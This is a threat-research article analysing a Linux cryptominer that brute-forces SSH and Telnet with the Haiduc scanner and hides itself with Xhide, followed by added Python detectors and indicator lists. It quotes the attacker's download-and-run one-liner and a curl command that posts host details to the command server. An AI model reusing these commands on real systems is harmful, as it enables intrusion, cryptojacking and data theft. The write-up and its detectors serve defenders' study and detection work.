Cryptocurrency Miner Uses Hacking Tool Haiduc and App Hider Xhide to Brute Force Machines and Servers
Trend Micro Security News
By Augusto Remillano II and Jemimah Molina (Threat Analysts)
A Trend Micro honeypot detected a cryptocurrency-mining threat staged on a compromised site, where the URL hxxps://upajmeter[.]com/assets/.style/min hosts the first-stage file that downloads the main shell script (detected by Trend Micro as Trojan.SH.MALXMR.UWEJS). The miner is a multi-component threat made up of Perl and Bash scripts, miner binaries, the process hider Xhide, and a scanner tool; it propagates by scanning for reachable machines and brute-forcing (primarily default) credentials.
Analysis of the threat revealed that the threat actor behind the malicious activity executes component files that run multiple times daily so that the infected machine’s status is regularly sent to the command-and-control server (C&C). The shell script used in the infection is also capable of downloading archived files that contain the miner’s scanner, hider, and final payload.
The threat also uses a process hider to conceal the miner binary, so a typical user is unlikely to notice the mining activity except through a drop in performance and suspicious network traffic. Combining a scanner, a brute-forcer, and a miner behind a process hider is a known pattern for threat actors of this kind.
The infection
The attacker first gains access to a machine through weak or default credentials, then runs the following command on the compromised machine:
cd /tmp;wget hxxps://upajmeter[.]com/assets/.style/min;curl -O hxxps://upajmeter[.]com/assets/.style/min;chmod +x min;perl min;rm -rf min*
The initial file min (detected as Trojan.Perl.MALXMR.UWEJS) downloads min.sh (detected as Trojan.SH.MALXMR.UWEJS), the main shell script that installs the threat's components. Once it runs, the main shell script first tries to kill existing cryptocurrency-mining processes; the list covers competing miners (minerd, yam) as well as names used by this threat's own components (haiduc, libssl, sparky.sh, start.sh):
killall -9 rand rx rd tsm tsm2 haiduc a sparky.sh 2238Xae b f i p y rsync ps go x s b run idle minerd crond yam xmr python cron ntpd start start.sh libssl sparky.sh
The shell script also downloads and executes the component downloaders cron.sh and nano.sh (Trojan.SH.MALXMR.UWEJT), which are scheduled to run hourly and every 30 minutes respectively. These drop rcmd.sh (detected as Trojan.SH.MALXMR.UWEJU), which reports the status of the infected machine back to the C&C at each run via an HTTP POST request:
curl -d "info=POST&data=SERVER---> $(whoami)@$SERVERIP
DATE---> $(date)
SERV---> $(uname -a) ===> $(nproc) PROCESORS ===> VIDEO $(lspci | grep VGA) ===>$(ps x|grep bash)" hxxp://upajmeter[.]com/assets/.style/remote/info.php > /dev/null
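The beacon above is easy to pick out on the wire: a POST to /assets/.style/remote/info.php whose body starts with info=POST&data=SERVER--->, repeated on cron's hourly and half-hourly schedule. The following Python is an added example, not code from Trend Micro or from the malware. It runs over constructed proxy log lines in a simplified format (timestamp, client, method, URL, quoted body prefix) and flags the component downloads from the staging directory, the beacon itself, and the regular cadence a cron-driven check-in produces. Only the URL paths and the body marker are taken from the article; the host is kept defanged exactly as the article prints it.

```python
"""Spot the rcmd.sh status beacon and the staged downloads in HTTP proxy logs.

Added example (not Trend Micro's code). The log lines are constructed in a
simplified, space-separated format: timestamp, client IP, method, URL, and the
quoted start of the request body.
"""
from dataclasses import dataclass
from datetime import datetime
from statistics import median

# Traits taken from the curl command and the URL list in the article.
STAGING_DIR = "/assets/.style/"
BEACON_PATH = STAGING_DIR + "remote/info.php"
BEACON_BODY_MARKER = "info=POST&data=SERVER--->"
COMPONENT_NAMES = {"min", "min.sh", "cron.sh", "rcmd.sh", "monero.tgz", "sslm.tgz"}

# Constructed sample: one benign client (10.0.0.7) and one infected host (10.0.0.23).
SAMPLE_LOG = """\
2020-08-12T10:00:05 10.0.0.7 GET https://example.internal/index.html ""
2020-08-12T10:00:41 10.0.0.23 GET hxxps://upajmeter[.]com/assets/.style/min ""
2020-08-12T10:00:44 10.0.0.23 GET hxxps://upajmeter[.]com/assets/.style/min.sh ""
2020-08-12T10:30:02 10.0.0.23 POST hxxp://upajmeter[.]com/assets/.style/remote/info.php "info=POST&data=SERVER---> root@10.0.0.23"
2020-08-12T11:00:03 10.0.0.23 POST hxxp://upajmeter[.]com/assets/.style/remote/info.php "info=POST&data=SERVER---> root@10.0.0.23"
2020-08-12T11:30:01 10.0.0.23 POST hxxp://upajmeter[.]com/assets/.style/remote/info.php "info=POST&data=SERVER---> root@10.0.0.23"
2020-08-12T11:31:00 10.0.0.7 POST https://example.internal/api/info.php "user=alice"
"""


@dataclass(frozen=True)
class Hit:
    ts: datetime
    client: str
    reason: str


def split_url(url):
    """Return (host, path) by hand: urllib's urlsplit rejects the bracketed,
    defanged host 'upajmeter[.]com' as an invalid IPv6 literal."""
    rest = url.split("://", 1)[-1]
    host, _, path = rest.partition("/")
    return host, "/" + path


def parse_line(line):
    """Parse one constructed log line into (ts, client, method, url, body)."""
    head, _, body = line.partition(' "')
    ts, client, method, url = head.split(" ", 3)
    return datetime.fromisoformat(ts), client, method, url, body.rstrip('"')


def classify(method, url, body):
    """Name the suspicious trait of one request, or None if it looks benign."""
    _, path = split_url(url)
    if path.endswith(BEACON_PATH):
        # Body logging is optional on many proxies; the path alone is still a hit.
        return "c2-beacon" if method == "POST" and body.startswith(BEACON_BODY_MARKER) else "c2-url"
    if STAGING_DIR in path and path.rsplit("/", 1)[-1] in COMPONENT_NAMES:
        return "component-download"
    return None


def scan(log_text):
    """All suspicious requests in the log, in log order."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, client, method, url, body = parse_line(line)
        reason = classify(method, url, body)
        if reason:
            hits.append(Hit(ts, client, reason))
    return hits


def beacon_cadence(hits, tolerance=0.1):
    """Per client, the median gap in seconds between beacons when the gaps are
    regular (every gap within `tolerance` of the median, at least three beacons).
    A cron-driven check-in like rcmd.sh's hourly/30-minute schedule shows up here."""
    by_client = {}
    for h in hits:
        if h.reason == "c2-beacon":
            by_client.setdefault(h.client, []).append(h.ts)
    cadence = {}
    for client, stamps in by_client.items():
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        if len(gaps) < 2:
            continue
        mid = median(gaps)
        if mid > 0 and all(abs(g - mid) <= tolerance * mid for g in gaps):
            cadence[client] = mid
    return cadence


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for h in found:
        print(h.ts.isoformat(), h.client, h.reason)
    print(beacon_cadence(found))
```

The cadence check needs at least three beacons from one client and deliberately ignores the first-stage fetches, which happen once. Because the lower-tolerance match is on the path, a host that only logs request lines still produces c2-url hits.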
The archived files
The shell script is also capable of downloading and extracting the miner archive monero.tgz (detected as Trojan.Linux.MALXMR.UWEJS) for the execution of its contents. The archive file contains the miner binaries, which can be executed by various shell and Perl scripts that are also contained in the file.
The archive mainly holds configuration files and the scripts and binaries that run the miner: config.txt, cpu.txt, h32 (Xhide, 32-bit), h64 (Xhide, 64-bit), pools.txt, run, startMSR, x, x.pl, xmr-stak, and xmrig. The Xhide binary hides the cryptocurrency-mining processes by launching them under the fake process name "-bash", the name a login shell normally shows in a process listing.
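What Xhide changes, and what it cannot change, decides how to find the hidden miner. The following Python is an added example, not code from the article or from Xhide. It compares the argv[0] a process shows in ps (read from /proc/<pid>/cmdline, which Xhide controls) against the kernel-held /proc/<pid>/exe link and /proc/<pid>/comm, which a faked argv[0] does not alter. The process records are constructed; snapshot_proc() reads a live Linux /proc tree, and the scratch-directory list is an assumption based on the loader's cd /tmp.

```python
"""Unmask a process that Xhide has renamed to "-bash".

Added example; not code from the article or from Xhide. Xhide fakes argv[0],
which is what `ps` and `top` print from /proc/<pid>/cmdline. Two facts it
cannot fake are kept by the kernel: the /proc/<pid>/exe symlink (the file that
was executed) and /proc/<pid>/comm (set from that file's name at exec time,
unless the process later calls prctl(PR_SET_NAME)). Comparing the three
exposes the disguise.
"""
import os
from dataclasses import dataclass

SHELL_NAMES = {"bash", "sh", "dash", "zsh"}
# Assumption: the loader on this page works out of /tmp; these are the usual scratch dirs.
SCRATCH_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")


@dataclass(frozen=True)
class Proc:
    pid: int
    cmdline: str    # argv joined by spaces; attacker-controlled
    exe: str        # target of /proc/<pid>/exe; ends with " (deleted)" if the file is gone
    comm: str       # /proc/<pid>/comm (15 chars max)
    cwd: str = "/"


# Constructed sample: a real login shell, an Xhide-style disguised miner whose
# binary was removed after launch (cf. "rm -rf min*"), a genuine bash running a
# script, and an unrelated daemon.
SAMPLE = [
    Proc(1234, "-bash", "/usr/bin/bash", "bash", "/home/dev"),
    Proc(2345, "-bash", "/tmp/xmrig (deleted)", "xmrig", "/tmp"),
    Proc(3456, "bash run", "/usr/bin/bash", "bash", "/tmp"),
    Proc(4567, "/usr/sbin/sshd -D", "/usr/sbin/sshd", "sshd"),
]

STRONG = {"exe-mismatch", "comm-mismatch"}   # reasons that alone justify a finding


def claims_to_be_shell(cmdline):
    """argv[0] looks like a (login) shell: 'bash', '-bash', '/bin/sh', ..."""
    argv0 = cmdline.split(" ", 1)[0].lstrip("-")
    return os.path.basename(argv0) in SHELL_NAMES


def reasons(p):
    """Kernel-held facts that contradict a shell-looking argv[0]; empty if consistent."""
    if not claims_to_be_shell(p.cmdline):
        return []
    deleted = p.exe.endswith(" (deleted)")
    exe_path = p.exe[: -len(" (deleted)")] if deleted else p.exe
    out = []
    if os.path.basename(exe_path) not in SHELL_NAMES:
        out.append("exe-mismatch")
    if p.comm not in SHELL_NAMES:
        out.append("comm-mismatch")
    if deleted:                      # corroborating only: also true for bash after a package upgrade
        out.append("exe-deleted")
    if exe_path.startswith(SCRATCH_DIRS):
        out.append("exe-in-scratch-dir")
    return out


def find_disguised(procs):
    """[(pid, reasons)] for every process whose shell-looking name contradicts its binary."""
    found = []
    for p in procs:
        r = reasons(p)
        if STRONG & set(r):
            found.append((p.pid, r))
    return found


def snapshot_proc(proc_root="/proc"):
    """Read live processes on Linux (root is needed to resolve other users' exe links)."""
    procs = []
    for name in os.listdir(proc_root):
        if not name.isdigit():
            continue
        d = os.path.join(proc_root, name)
        try:
            with open(os.path.join(d, "cmdline"), "rb") as f:
                cmdline = f.read().replace(b"\0", b" ").strip().decode(errors="replace")
            with open(os.path.join(d, "comm")) as f:
                comm = f.read().strip()
            exe = os.readlink(os.path.join(d, "exe"))
            cwd = os.readlink(os.path.join(d, "cwd"))
        except OSError:
            continue   # process exited, kernel thread, or permission denied
        procs.append(Proc(int(name), cmdline, exe, comm, cwd))
    return procs


if __name__ == "__main__":
    for pid, why in find_disguised(SAMPLE):
        print(pid, ", ".join(why))
```

Run it against snapshot_proc() on a suspect host; exe-deleted and exe-in-scratch-dir are reported only as corroboration, since a package upgrade also leaves a real bash with a deleted exe link.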
The main shell script then downloads and extracts the scanner archive sslm.tgz (detected as Trojan.Linux.SSHBRUTE.UWEJS) and runs its contents. The archive holds the Telnet/SSH scanner binary, the shell and Perl scripts that launch it, and the credential lists used for brute forcing.
The contents of the scanner archive include .pass (short password list used for random public IP blocks), pass (long password list used for private IP blocks), libssl (the UPX-packed Haiduc scanner), sparky.sh, start, start.pl, and start.sh.
The scanner tries to infect and take control of devices in private IP ranges (every device on the same local network as the host machine) by brute forcing a credential list of 3,637 username and password combinations. It also targets the public IP range {random number from 0-216}.0.0.0/8 using a different, shorter credential list. Judging by the credentials used, the attack mostly targets servers related to databases, storage, gaming, and mining rigs.
If successful, the attacker will then be able to issue the aforementioned commands for cryptocurrency-mining.
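On the receiving end, the scanner's credential spray looks like a burst of sshd password failures from one source across many usernames, followed, when a default credential works, by an accepted password login from the same source. The following Python is an added example, not code from the article. It parses constructed OpenSSH syslog lines and reports each burst together with any password acceptance that follows it. The window, the threshold, the hostname and the sample usernames (chosen to echo the database, gaming and mining-rig targets named above) are assumptions.

```python
"""Flag SSH password-guessing bursts and any password login that follows one.

Added example, not from the article. Key-based logins are deliberately not
counted as a success: a burst is only interesting when a *password* is accepted.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample in the usual OpenSSH syslog form.
SAMPLE_AUTH_LOG = """\
Aug 12 10:00:01 db01 sshd[2101]: Failed password for root from 203.0.113.9 port 41022 ssh2
Aug 12 10:00:02 db01 sshd[2103]: Failed password for invalid user admin from 203.0.113.9 port 41030 ssh2
Aug 12 10:00:02 db01 sshd[2105]: Failed password for invalid user oracle from 203.0.113.9 port 41036 ssh2
Aug 12 10:00:03 db01 sshd[2107]: Failed password for invalid user minecraft from 203.0.113.9 port 41042 ssh2
Aug 12 10:00:04 db01 sshd[2109]: Failed password for root from 203.0.113.9 port 41050 ssh2
Aug 12 10:00:05 db01 sshd[2111]: Accepted password for root from 203.0.113.9 port 41058 ssh2
Aug 12 10:05:17 db01 sshd[2140]: Failed password for alice from 10.0.0.7 port 50210 ssh2
Aug 12 10:05:25 db01 sshd[2142]: Accepted publickey for alice from 10.0.0.7 port 50212 ssh2
"""

TS_RE = re.compile(r"^(?P<ts>[A-Z][a-z]{2} +\d{1,2} \d\d:\d\d:\d\d) ")
FAILED_RE = re.compile(
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\d+\.\d+\.\d+\.\d+) port \d+"
)
ACCEPT_RE = re.compile(
    r"Accepted (?:password|keyboard-interactive/pam) for (?P<user>\S+) from (?P<ip>\d+\.\d+\.\d+\.\d+) port \d+"
)


def parse(line):
    """(timestamp, 'failed' | 'accepted', user, ip), or None for lines we ignore."""
    m = TS_RE.match(line)
    if not m:
        return None
    # syslog stamps carry no year; relative ordering is all we need here
    ts = datetime.strptime(m.group("ts"), "%b %d %H:%M:%S")
    for kind, rx in (("failed", FAILED_RE), ("accepted", ACCEPT_RE)):
        e = rx.search(line)
        if e:
            return ts, kind, e.group("user"), e.group("ip")
    return None


def find_bursts(log_text, threshold=5, window=timedelta(seconds=60)):
    """Per source IP that produced `threshold` failures inside `window`: the total
    failure count, the usernames tried, and the password logins accepted at or
    after the burst began (the success-after-spray signal)."""
    fails, accepts = defaultdict(list), defaultdict(list)
    for line in log_text.splitlines():
        ev = parse(line)
        if ev:
            ts, kind, user, ip = ev
            (fails if kind == "failed" else accepts)[ip].append((ts, user))
    report = {}
    for ip, events in fails.items():
        events.sort()
        for i in range(len(events) - threshold + 1):
            first, last = events[i][0], events[i + threshold - 1][0]
            if last - first <= window:
                report[ip] = {
                    "failures": len(events),
                    "users": sorted({u for _, u in events}),
                    "accepted_after": [u for t, u in accepts.get(ip, []) if t >= first],
                }
                break
    return report


if __name__ == "__main__":
    for ip, r in find_bursts(SAMPLE_AUTH_LOG).items():
        print(ip, r)
```

A non-empty accepted_after list is the line worth paging on: the source guessed its way in, and the download one-liner shown earlier is what usually follows. A single failure from an internal user, as for alice here, never reaches the threshold.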
Protecting devices from cryptocurrency-mining threats
The threat actors behind this cryptocurrency-miner have utilized Haiduc and Xhide, known and old tools that have been notoriously used for various malicious activities. These tools, combined with brute-forced weak credentials, can persist in systems while operating under the radar of traditional network security solutions. Such malware can also affect system performance and expose users to other forms of compromise.
While we haven’t seen widespread attacks from this threat actor yet, users should adopt security measures that can defend systems against any potential attacks, such as:
- Taking caution against known attack vectors such as unsolicited emails, socially engineered links and attachments, suspicious websites, and dubious third-party applications
- Changing devices’ default credentials to prevent unauthorized access
- Updating devices with the latest patches
- Regularly verifying that all created accounts are only used for legitimate purposes
Users can also consider adopting security solutions that can provide protection from malicious bot-related activities through a cross-generational blend of threat defense techniques. Trend Micro™ XGen™ security provides high-fidelity machine learning that can secure the gateway and endpoints, and protect physical, virtual, and cloud workloads. With technologies that employ web/URL filtering, behavioral analysis, and custom sandboxing, XGen security offers protection against ever-changing threats that bypass traditional controls and exploit known and unknown vulnerabilities. XGen security also powers Trend Micro’s suite of security solutions: Hybrid Cloud Security, User Protection, and Network Defense.
Users of Trend Micro™ Deep Discovery Inspector (DDI) are protected from this threat by the following rules, which cover the mining network traffic and the C&C connection respectively:
- Rule 2573: MINER – TCP (Request)
- Rule 4313: MALXMR – HTTP (Request)
Indicators of compromise (IoCs)
SHA-256
Filename | SHA-256 hash | Trend Micro Pattern Detection | Notes
config.txt | 91a80ee885d7586292260750a4129ad305fe252a39002cbde546e8161873a906 | Trojan.Win32.MALXMR.BJ | Config file
cpu.txt | 60a1f3cf6a6a72e45bfb299839f25e872e016b6e1f9d465477224d0c6bb2d53a | Trojan.Win32.MALXMR.BJ | Config file
cron.sh | fee602278dee4cc23d5a6c19f10d1d45702a9bbc14e1a0b54af938dff3bef22e | Trojan.SH.MALXMR.UWEJT | Downloads component file (same hash as nano.sh)
h32 | 45ed59d5b27d22567d91a65623d3b7f11726f55b497c383bc2d8d330e5e17161 | HackTool.Linux.XHide.GA | Xhide binary (32-bit)
h64 | 7fe9d6d8b9390020862ca7dc9e69c1e2b676db5898e4bfad51d66250e9af3eaf | HackTool.Linux.XHide.GA | Xhide binary (64-bit)
libssl | 6163a3ca3be7c3b6e8449722f316be66079207e493830c1cf4e114128f4fb6a4 | HackTool.Linux.SSHBRUTE.GA | Haiduc scanner (UPX packed)
min | 07f6e31ffab85fe561c6f39aa3cf62c71017b790ee8eb1b028579ef982e861ab | Trojan.Perl.MALXMR.UWEJS | Downloads the main shell script
min.sh | 3f36a82e37f8dc885bab158568d0df3b7857b830250fdf32be39a1dadea6f460 | Trojan.SH.MALXMR.UWEJS | Main shell script
monero.tgz | eb34d838d0b678dcc2f19140dc312680782e011b1b1ecb0f2ec890f5d3943544 | Trojan.Linux.MALXMR.UWEJS | Miner archive
nano.sh | fee602278dee4cc23d5a6c19f10d1d45702a9bbc14e1a0b54af938dff3bef22e | Trojan.SH.MALXMR.UWEJT | Downloads component file (same hash as cron.sh)
pools.txt | cd590e2343810e17d5c96d8db76c11b4e08ad7b3c3ed5424965b9098f0308f57 | Trojan.Win32.MALXMR.BJ | Config file
rcmd.sh | 46dc8a5ba6f7dc9ce1f51039b434d53bd90bf19314f9c4b4238c23a29230ccff | Trojan.SH.MALXMR.UWEJU | Reports to C&C
run | 420aeb234ab803ac8e12250ce15c4c63870bbd68f6037ef68655187739429dc1 | Trojan.SH.MALXMR.UWEJW | Executes miner and hider component
sparky.sh | 64a66a8254b45debc1d0efea6662e240d9832ef0667ce805d2b6aaa8ff90ce18 | Trojan.SH.SSHBRUTE.UWEJS | Executes scanner component
sslm.tgz | 8cce20ac223b14200e8b1fc23bde114e19bfef5762d461156dad13f22ea25a5f | Trojan.Linux.SSHBRUTE.UWEJS | Scanner archive
start | 5725edd6ae0a832ec1f474caa78345761db630278459db17434d08876722659b | Trojan.SH.SSHBRUTE.UWEJS | Executes component file
start.sh | d75bac897dfbdd5ed97775ae30e23a55695868c3e5702f449364400815f6a049 | Trojan.SH.SSHBRUTE.UWEJS | Executes component file
startMSR | 473b58ed5e8667ff8ab54044ed8b070edb5a227837ffb28b992396dcb4a3aacb | Trojan.SH.MALXMR.UWEJW | Executes miner and hider component
x | 78ea53a03343b0a471476b8e1f3fae6ef847ad097dd16be4628d650bce353e4d | Trojan.SH.MALXMR.UWEJS | Executes component file
xmr-stak | 8269773c98c259acb7d109de1c448673d1e45b3684834b19335bd42c84977e4c | Coinminer.Linux.MALXMR.UWEKF | Miner binary
xmrig | e41b2012a4fdc58370f243f3dbb65ee5db12b007919528b0d4bd0d9b0f948abb | Coinminer.Linux.MALXMR.SMDSL64 | Miner binary
Related malicious URLs
139[.]99[.]42[.]75:3333
pool[.]masari[.]hashvault[.]pro:3333
hxxps://upajmeter[.]com/assets/.style/min
hxxps://upajmeter[.]com/assets/.style/min.sh
hxxps://upajmeter[.]com/assets/.style/remote/cron.sh
hxxps://upajmeter[.]com/assets/.style/monero.tgz
hxxps://upajmeter[.]com/assets/.style/sslm.tgz
hxxps://upajmeter[.]com/assets/.style/remote/info.php
hxxps://upajmeter[.]com/assets/.style/remote/rcmd.sh